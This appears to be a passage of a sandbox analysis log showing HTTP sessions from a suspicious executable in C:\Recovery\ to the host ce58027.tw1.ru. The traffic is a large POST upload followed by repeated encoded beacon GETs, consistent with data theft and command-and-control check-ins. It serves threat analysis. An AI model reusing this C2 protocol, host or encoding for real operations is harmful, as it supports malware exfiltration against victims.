Dec 29, 2024 00:07:15.019774914 CET	557	OUT	POST /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN HTTP/1.1 Content-Type: multipart/form-data; boundary=----------WebKitFormBoundary1w3KrLv8X3hkVvoa User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: ce58027.tw1.ru Content-Length: 83176 Expect: 100-continue Connection: Keep-Alive
Dec 29, 2024 00:07:15.375592947 CET	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 31 77 33 4b 72 4c 76 38 58 33 68 6b 56 76 6f 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 Data Ascii: ------------WebKitFormBoundary1w3KrLv8X3hkVvoaContent-Disposition: form-data; name="938fdda0d69dc2f44b98b6db0d9f7d2c"2UGZzQjZjNDO5kjY0EmMxEzM2MWM3AjN2UjMxQWMlRGMwUTO5UmNh1yM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2M----------
Dec 29, 2024 00:07:15.495273113 CET	4944	OUT	Data Raw: f2 3a 09 d9 5e fb 0b 82 f8 91 86 49 ab dd 81 72 8e 64 e5 c0 9b fd 6e b4 eb d7 55 17 7f c5 56 56 eb b1 45 4b b6 55 83 ae 94 d1 97 a3 e5 c6 ea 50 be 1c 07 d5 c3 60 91 9c 58 30 96 78 bc 27 01 be 2a c7 14 ee 26 9f 4e 28 06 ab 6d 59 46 dc 64 cd 2f 3e Data Ascii: :^IrdnUVVEKUP`X0x'&N(mYFd/>(}{)>fN0lUE=,a%S4iSA7kZ$vVDak9]T}n.gj}k}B,wi3'NNs/s>.
Dec 29, 2024 00:07:15.495316029 CET	2472	OUT	Data Raw: 41 f5 e3 18 4a 21 e9 42 b8 51 fd cc 58 82 4a a9 6f 59 95 d7 52 79 81 82 9e b0 b3 b6 83 db d0 d9 c1 d9 6b f1 9e 14 2b a2 8c 29 77 77 f1 cb ba 0a 9e 03 44 63 8a 91 e4 18 e2 49 8e a5 be b1 44 3b 54 c9 19 bc d5 dc 1b f9 ef 3d 34 1f aa 65 f8 f0 cf d8 Data Ascii: AJ!BQXJoYRyk+)wwDcID;T=4e93ZwNhm7(XS,Hk?R=E{y'JA1=)w2isje13^r{u\~,xqN
Dec 29, 2024 00:07:15.495368004 CET	2472	OUT	Data Raw: 14 4f e7 81 3c c4 84 78 76 26 6a d9 02 d9 43 f9 28 70 41 c9 f7 ee e6 f3 bf 0c cf 53 f2 06 7b be ba 3d 44 ba bf f3 89 3a 7e b2 bd 7f 16 55 5f e5 12 73 14 55 a6 2b ac 48 cb 97 9f 1f de 1a 63 f9 99 dd c9 3f 5c 0c d0 84 f1 e4 7b 9a 7c e0 6b 1c 58 1f Data Ascii: O<xv&jC(pAS{=D:~U_sU+Hc?\{\|kX3tM^q5,c;b4FL\|sgw2wTW8Uf,WW$_~x,6mKbw8*\|E&OCZF4g;tk #T&
Dec 29, 2024 00:07:15.495392084 CET	2472	OUT	Data Raw: 45 a0 3f 2c a1 e2 b6 f4 50 ba bb 4e 82 e1 20 4b 71 e4 ca 9f b8 ad c5 c1 32 0b db 54 8e 9e 55 09 49 6f 66 fd b5 ea a2 8b 14 c6 74 5c e1 89 c2 b3 aa 6e af 3f 17 d9 96 b6 f2 4d 1d 76 3b 88 6b 8a ce 6f d3 51 f2 aa 3c 91 30 5f 05 db a6 06 14 35 5e 43 Data Ascii: E?,PN Kq2TUIoft\n?Mv;koQ<0_5^CMvi!5-H+}3"VIAM^,LyL$-0}rkbu%Td'x ttm<<!DC`{ow=ib11r]rJt7O\|,Ps"jY'
Dec 29, 2024 00:07:15.495497942 CET	2472	OUT	Data Raw: f9 c2 65 43 65 98 00 ed c5 bb e1 49 be 0c c0 95 0c bf 66 d9 bc 90 bb 2f 5e 95 80 a5 9a b3 95 2d b3 95 f9 7e cc 6c bf 59 4c a4 c0 a1 ab b4 d2 6f ca 9e cb a5 a4 93 d5 f6 4d 33 cf e7 ee 9b fe 80 da d9 b6 d2 4f 29 64 38 57 3f a3 00 5c ab db d2 6e d1 Data Ascii: eCeIf/^-~lYLoM3O)d8W?\n-FW5/yT}B5FOyiQa6]RDL~5kbs}SH8,EC<Q6H%6wa<B/G5GDv;m~_3;Y7^35vH4\|
Dec 29, 2024 00:07:15.495524883 CET	2472	OUT	Data Raw: 50 f0 fd e4 87 7e 05 27 df f3 67 6a 24 a9 3d 52 f3 f0 00 7b c8 ea c1 5e 0c 1e 90 13 de aa e6 0b 29 32 29 80 ea 39 e8 a9 ba 8e 9b de 9f 71 47 5f 94 0b e3 71 88 05 39 8c 7d e7 4f 85 8a 09 42 e9 76 82 9a 29 49 e4 1f 7d 8f b5 9d 81 b1 99 81 c3 4e 7f Data Ascii: P~'gj$=R{^)2)9qG_q9}OBv)I}N+h^%y"}uc!)/wLx@z4>Wyg/?x\|g4Kq=)u@vBebpq{-Gok#U3LL"O`*[
Dec 29, 2024 00:07:15.495599985 CET	2472	OUT	Data Raw: 07 b6 0c fb 69 96 3b 4c 4f fc 13 6a f7 ae e0 81 c9 c7 77 52 ed 3e a0 e0 d3 1e 96 2f ab 37 04 cd bd 5c 84 7b 03 ea f4 32 8c 86 74 a3 11 88 7d 66 d1 70 fb a0 c6 bf a3 3c da f0 f1 92 63 46 16 96 ec f4 9a 80 d9 47 c4 a6 13 09 1c 71 ff 17 9e 88 90 e8 Data Ascii: i;LOjwR>/7\{2t}fp<cFGq8BPH{G#T,"B\|I#QU$OX>%RFZB[}bUCd5 d`:6HTVHtch%W'CF<HVT!j-vT4?cI=
Dec 29, 2024 00:07:15.495615959 CET	2472	OUT	Data Raw: a6 a2 66 73 fe ed ea ce 5d b3 c8 63 50 7f 6c cf 3d 66 44 ce f0 c9 26 19 6c a1 c9 a1 01 d5 fc 24 a4 ab cf 8a 73 de a8 e1 51 22 cd 98 b1 1c 5a 2f 2b 8c a3 5f 7a c0 e4 da c9 44 cf 41 1f bd f6 a1 11 73 af 82 ba 40 0e 9b ca a2 be 46 4f df 51 3d 5c 9a Data Ascii: fs]cPl=fD&l$sQ"Z/+_zDAs@FOQ=\qB2?'eM>)c4n5euM]kOxzg{vI$#]pL-ZTllvoYTRN1O$fTjOUWQ+z
Dec 29, 2024 00:07:15.539382935 CET	2472	OUT	Data Raw: e8 f3 88 35 5d de df f1 60 b6 5f d7 af 0e e1 81 e7 fb 87 33 42 2b 87 0a 23 96 ba 16 37 34 b1 ee 1e cd 3c b4 fe 18 2c dc e4 d8 b5 54 f2 47 94 1c 5d 8a 4a de 68 e9 d3 ed 2f 92 f7 4e ae 14 d1 e0 81 4e 3f 3c 50 bb 81 58 d7 45 d4 d3 fd 5d dd 5f 93 de Data Ascii: 5]`_3B+#74<,TG]Jh/NN?<PXE]_=<3Fo'UccTn"lc[E1Cj^:"x#Wz_r$4'_n^l,~+NiUb%_!!lhz% qdL?<icm6
Dec 29, 2024 00:07:16.415445089 CET	25	IN	HTTP/1.1 100 Continue
Dec 29, 2024 00:07:16.957220078 CET	161	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:07:15.090100050 CET	2129	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru Connection: Keep-Alive
Dec 29, 2024 00:07:16.523910046 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:07:21.652832985 CET	2129	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru Connection: Keep-Alive
Dec 29, 2024 00:07:21.890851021 CET	1236	OUT	Data Raw: 53 35 52 6d 64 53 31 6d 59 77 52 6d 52 57 52 6b 52 72 6c 30 63 4a 6c 47 56 70 39 6d 61 4a 52 6e 52 79 6b 56 61 57 4a 6a 56 36 78 57 62 4a 4e 58 53 54 64 56 61 76 70 57 53 73 56 6a 4d 69 39 6d 51 7a 49 57 65 4f 64 56 59 4f 35 45 57 68 6c 32 64 70 Data Ascii: S5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWEl
Dec 29, 2024 00:07:23.542907000 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:07:28.671158075 CET	2129	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru Connection: Keep-Alive
Dec 29, 2024 00:07:30.056643009 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:07:35.184626102 CET	2129	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru Connection: Keep-Alive
Dec 29, 2024 00:07:36.524277925 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:07:41.817550898 CET	2105	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru
Dec 29, 2024 00:07:43.252525091 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:07:48.387270927 CET	2129	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru Connection: Keep-Alive
Dec 29, 2024 00:07:49.772392035 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
